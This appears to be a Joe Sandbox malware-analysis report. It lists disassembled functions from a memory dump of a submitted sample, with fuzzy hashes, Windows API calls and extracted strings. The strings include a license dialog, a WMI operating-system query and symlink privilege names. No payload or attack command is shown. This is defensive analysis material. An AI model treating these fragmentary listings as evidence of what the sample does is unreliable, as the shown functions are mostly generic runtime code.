Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: AE9178F022074A9BDB24FF64D894BFA77D4EB90300F10096DF99687282DB74A565CB52

Function 002343BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 95c7a4049002d88ec6bb4549dfa3ea43969c646be1ce262e1b1febf630a21457
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: C58182F07243475FDB24FE54D8C1BBD77D4EBA0304F4009BDE58687281DA70A9A58B52

Function 002451C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194106d2ac7a82895f7e3b96a36f7fa5f78baf1fe11ca0b635846d256b12bcf8
Instruction ID: 88859254c93970f0211d5756d16c7b3de079504c99b87dedd0ea75381c1a418d
Opcode Fuzzy Hash: 194106d2ac7a82895f7e3b96a36f7fa5f78baf1fe11ca0b635846d256b12bcf8
Instruction Fuzzy Hash: 2A614331A30F3A67DA3CDE6868957BE2394EB42744F14065BFCC2DF283D6D19D628A11

Function 00244F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 19023dcc4784ecd266c65a345d45b8b0df452347cbb20d1e3e57052baff2d9ad
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: BF517B25230F6A57DF3C9D688456BBF23C59B1A304F281919E8CBCB683C645ED39C791

Function 0022EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f021b3badca55b5b6d6a2a17eb8cccb86639f233e955c3b3be9f189807f6c1
Instruction ID: dddb92b68126b1915470748ef8c226c9688217103797b3c4bcc3d3918c47e5cf
Opcode Fuzzy Hash: d9f021b3badca55b5b6d6a2a17eb8cccb86639f233e955c3b3be9f189807f6c1
Instruction Fuzzy Hash: 9A51C4315183E59ED711CF68D24046EBFF0AEAA314F4A09BDE4D95B243C231DB5ACB62

Function 002300B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ce28551961c57528b962010c73ab1e2c306c52d1263f4310702c1d2dc9cc40
Instruction ID: a8e09510d26f14b9ff47a706395920039f7cba8e4d02846edefa790bc5dba992
Opcode Fuzzy Hash: 94ce28551961c57528b962010c73ab1e2c306c52d1263f4310702c1d2dc9cc40
Instruction Fuzzy Hash: 1F51DFB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A

Function 00233E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 74d055b0ea68784214e55ae444bd870d1db37db46f67aaff55893280b8ca9f2e
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 5E3105B1A247579FCB14DF28C85126ABBE0FB95314F50492DE489C7742C738EA1ACF92

Function 0022E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0022E30E

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

Part of subcall function 00231DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00261030,?,0022D928,00000000,?,00000050,00261030), ref: 00231DC4

_strlen.LIBCMT ref: 0022E32F
SetDlgItemTextW.USER32(?,0025E274,?), ref: 0022E38F
GetWindowRect.USER32(?,?), ref: 0022E3C9
GetClientRect.USER32(?,?), ref: 0022E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0022E475
GetWindowRect.USER32(?,?), ref: 0022E4A2
SetWindowTextW.USER32(?,?), ref: 0022E4DB
GetSystemMetrics.USER32(00000008), ref: 0022E4E3
GetWindow.USER32(?,00000005), ref: 0022E4EE
GetWindowRect.USER32(00000000,?), ref: 0022E51B
GetWindow.USER32(00000000,00000002), ref: 0022E58D

Strings

d, xrefs: 0022E3F5
CAPTION, xrefs: 0022E4BD
t%, xrefs: 0022E34A
$%s:, xrefs: 0022E302

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t%
API String ID: 2407758923-2232208040
Opcode ID: c7b1914924362703993787e44b7ef899dc5a6e20533e9b75c01b638b305b6bc8
Instruction ID: 3154af5d908f4516d59caef4c77461b7a1ef0cb2b86985f8b119fda752d2b096
Opcode Fuzzy Hash: c7b1914924362703993787e44b7ef899dc5a6e20533e9b75c01b638b305b6bc8
Instruction Fuzzy Hash: F781C372114311AFDB10DFA8DC89A6FBBE9EB88B04F05091DFA84D7250D634E9158B52

Function 0024CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0024CB66

Part of subcall function 0024C701: _free.LIBCMT ref: 0024C71E
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C730
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C742
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C754
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C766
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C778
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C78A
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C79C
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C7AE
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C7C0
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C7D2
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C7E4
Part of subcall function 0024C701: _free.LIBCMT ref: 0024C7F6

_free.LIBCMT ref: 0024CB5B

Part of subcall function 00248DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?), ref: 00248DE2
Part of subcall function 00248DCC: GetLastError.KERNEL32(?,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?,?), ref: 00248DF4

_free.LIBCMT ref: 0024CB7D
_free.LIBCMT ref: 0024CB92
_free.LIBCMT ref: 0024CB9D
_free.LIBCMT ref: 0024CBBF
_free.LIBCMT ref: 0024CBD2
_free.LIBCMT ref: 0024CBE0
_free.LIBCMT ref: 0024CBEB
_free.LIBCMT ref: 0024CC23
_free.LIBCMT ref: 0024CC2A
_free.LIBCMT ref: 0024CC47
_free.LIBCMT ref: 0024CC5F

Strings

h%, xrefs: 0024CC0E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h%
API String ID: 161543041-890316640
Opcode ID: 485711b29f3716257bd4d5d75dc9a1ef42863a36cf6386edf328bdaab2f2e058
Instruction ID: 899166c30ccc8d39e9f4baf32e1306243458a1e590cd80305bc44687791754be
Opcode Fuzzy Hash: 485711b29f3716257bd4d5d75dc9a1ef42863a36cf6386edf328bdaab2f2e058
Instruction Fuzzy Hash: B4314D31A22306DFEB69AE3DD846B5AB7E9EF10314F20441AE549D7192DF71AC60CF14

Function 002496F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00249705

Part of subcall function 00248DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?), ref: 00248DE2
Part of subcall function 00248DCC: GetLastError.KERNEL32(?,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?,?), ref: 00248DF4

_free.LIBCMT ref: 00249711
_free.LIBCMT ref: 0024971C
_free.LIBCMT ref: 00249727
_free.LIBCMT ref: 00249732
_free.LIBCMT ref: 0024973D
_free.LIBCMT ref: 00249748
_free.LIBCMT ref: 00249753
_free.LIBCMT ref: 0024975E
_free.LIBCMT ref: 0024976C

Strings

0d%, xrefs: 002496FC

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d%
API String ID: 776569668-2445231718
Opcode ID: e5bda10e7f7224e133109a317332d0c74caeeb6e9488b7ef620023546f395d37
Instruction ID: fd816fe50c9a5fb157699db197ad267ae683484a73d5be6b476fb8a670408d64
Opcode Fuzzy Hash: e5bda10e7f7224e133109a317332d0c74caeeb6e9488b7ef620023546f395d37
Instruction Fuzzy Hash: 31119376921109EFCB09EFA4C842CDD3BB5EF14350B5154A1FB088F262DE32DAA09F84

Function 00239711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00239736
_wcslen.LIBCMT ref: 002397D6
GlobalAlloc.KERNEL32(00000040,?), ref: 002397E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00239806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0023982D

Strings

</html>, xrefs: 002397B7
utf-8"></head>, xrefs: 0023976B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00239760
<html>, xrefs: 00239755, 0023978E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 36ad5ad2a46c9cb0b91bcd437b09cef3a11b8f18cb374e90c2735ece1b56e269
Instruction ID: ba16a1d7b8d51314a716e523c68bb93aa824ff5b8001ff3753412936705e9549
Opcode Fuzzy Hash: 36ad5ad2a46c9cb0b91bcd437b09cef3a11b8f18cb374e90c2735ece1b56e269
Instruction Fuzzy Hash: 96314EB11293027AE729AF349C06F6FB79CDF83711F10051DF501961C1EBB09AA98B65

Function 0023D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0023D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0023D6ED

Part of subcall function 00231FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0022C116,00000000,.exe,?,?,00000800,?,?,?,00238E3C), ref: 00231FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0023D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0023D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0023D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0023D75D
DeleteObject.GDI32(00000000), ref: 0023D764
GetWindow.USER32(00000000,00000002), ref: 0023D76D

Strings

STATIC, xrefs: 0023D6F3

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 44ab897044bd25c3aafdd5ee61b875b2df0b5d021f7be7f02a91e8d8c1a9ab75
Instruction ID: f9def28c2134e571f4e3e9a21923ee7152df9d3b8a3bf8125462c2bd877d8224
Opcode Fuzzy Hash: 44ab897044bd25c3aafdd5ee61b875b2df0b5d021f7be7f02a91e8d8c1a9ab75
Instruction Fuzzy Hash: FB1136B66613117BE620AF70FC4FFAFB65CAF00F01F004121FA41E20D1DA648B254BA6

Function 00242E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00242F50
___TypeMatch.LIBVCRUNTIME ref: 0024305E
_UnwindNestedFrames.LIBCMT ref: 002431B0
CallUnexpected.LIBVCRUNTIME ref: 002431CB
_abort.LIBCMT ref: 002431D0

Strings

csm, xrefs: 00242EDB
csm, xrefs: 00242E6E
csm, xrefs: 00242F87

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 2318364ce15923db1a213f0b32bf5ac310d4981865267bee4bb14802edc8a750
Instruction ID: 8cf8188d65016378bf0c0486f648f8ead79e7c9c93ea6f6636914c89fc4c6157
Opcode Fuzzy Hash: 2318364ce15923db1a213f0b32bf5ac310d4981865267bee4bb14802edc8a750
Instruction Fuzzy Hash: D7B1793182020AEFCF2DDFA5C8819AEBBB5BF14310F55415AF8096B212D731EA65CF91

Function 0022AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0022AF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 0022AFCA
ROOT\CIMV2, xrefs: 0022AF5C
Windows 10, xrefs: 0022B0C2
n#, xrefs: 0022AFC0
WQL, xrefs: 0022AFDC
Name, xrefs: 0022B0B0

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n#
API String ID: 3519838083-1372726400
Opcode ID: f851a15a91fc1983b918cf1860ae1ea45bc43187c07f94573c84adfc89de46ef
Instruction ID: 40777d9b990b68660d9f1b28ac701c4cafabaed47c6b22bc4522ca69abdf8318
Opcode Fuzzy Hash: f851a15a91fc1983b918cf1860ae1ea45bc43187c07f94573c84adfc89de46ef
Instruction Fuzzy Hash: FE718D70A10629EFDF15DFA4EC999AEB7B8FF48751B040159E912E76A0CB30AE01CB50

Function 00226FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00226FAA
_wcslen.LIBCMT ref: 00227013
_wcslen.LIBCMT ref: 00227084

Part of subcall function 00227A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00227AAB
Part of subcall function 00227A9C: GetLastError.KERNEL32 ref: 00227AF1
Part of subcall function 00227A9C: CloseHandle.KERNEL32(?), ref: 00227B00

Strings

\??\, xrefs: 0022702B
SeRestorePrivilege, xrefs: 00226FC2
UNC\, xrefs: 00227051
SeCreateSymbolicLinkPrivilege, xrefs: 00226FCC

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 1e914dfe4beb6680921396003ddb1a24615cd8ffd827d79ee212b53eca2f0c6b
Instruction ID: 2c96fda7cf419aefebe1d011e4403d8d17439c1a9cbe853b26d00f27996bfbc1
Opcode Fuzzy Hash: 1e914dfe4beb6680921396003ddb1a24615cd8ffd827d79ee212b53eca2f0c6b
Instruction Fuzzy Hash: 7841E6B1D2C365BAEF21EBF0AC86FEE776C9F05344F004455F945A6182D670AA788A21

Function 0023B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

EndDialog.USER32(?,00000001), ref: 0023B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0023B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0023B650
SetWindowTextW.USER32(?,?), ref: 0023B661
GetDlgItem.USER32(?,00000065), ref: 0023B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0023B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0023B694

Strings

LICENSEDLG, xrefs: 0023B5D4

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 5108ba7bd96a24fdb9e4133a1692797f3b5611fe3f5514bab58ae527b9b3bf3f
Instruction ID: 9b0d6237a37ac57a45713da7bcfdd1169010ee359d1abd675777aa39148e781e
Opcode Fuzzy Hash: 5108ba7bd96a24fdb9e4133a1692797f3b5611fe3f5514bab58ae527b9b3bf3f
Instruction Fuzzy Hash: 3621B472225205BBD212DF66FD4EF3B3B6DEB46B41F010019FB04954A2DB6299619B31

Function 0023FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B0ABE22D,00000001,00000000,00000000,?,?,0022AF6C,ROOT\CIMV2), ref: 0023FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0022AF6C,ROOT\CIMV2), ref: 0023FE14
SysAllocString.OLEAUT32(00000000), ref: 0023FE1F
